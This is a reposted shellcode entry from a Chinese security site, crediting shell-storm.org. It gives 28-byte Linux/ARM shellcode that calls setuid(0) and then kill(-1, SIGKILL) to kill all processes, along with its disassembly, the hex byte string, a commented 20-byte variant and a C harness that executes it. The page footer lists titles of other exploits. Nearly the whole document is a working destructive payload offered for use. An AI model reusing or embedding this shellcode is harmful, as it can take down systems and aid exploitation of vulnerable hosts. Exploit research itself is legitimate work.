Linux/ARM - setuid(0) & kill(-1, SIGKILL)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes

来源：http://shell-storm.org 作者：Salwan 发布时间：2010-06-30

/*
Title: Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
(Kill all processes)

Date: 2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)

Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/

    8054: e28f3001 add r3, pc, #1   ; 0x1
    8058: e12fff13 bx r3
    805c: 1b24      subs r4, r4, r4
    805e: 1c20      adds r0, r4, #0
    8060: 2717      movs r7, #23
    8062: df01      svc 1
    8064: 1a92      subs r2, r2, r2
    8066: 1c10      adds r0, r2, #0
    8068: 3801      subs r0, #1
    806a: 2109      movs r1, #9
    806c: 2725      movs r7, #37
    806e: df01      svc 1

#include <stdio.h>

/* kill all processes without setuid(0) - 20 bytes */

// char *SC = "\x01\x30\x8f\xe2"
//            "\x13\xff\x2f\xe1"
//            "\x92\x1a\x10\x1c"
//            "\x01\x38\x09\x21"
//            "\x25\x27\x01\xdf";

/* kill all processes with setuid(0) - 28 byes */

char *SC = "\x01\x30\x8f\xe2"
           "\x13\xff\x2f\xe1"
           "\x24\x1b\x20\x1c"
           "\x17\x27\x01\xdf"
           "\x92\x1a\x10\x1c"
           "\x01\x38\x09\x21"
           "\x25\x27\x01\xdf";

int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告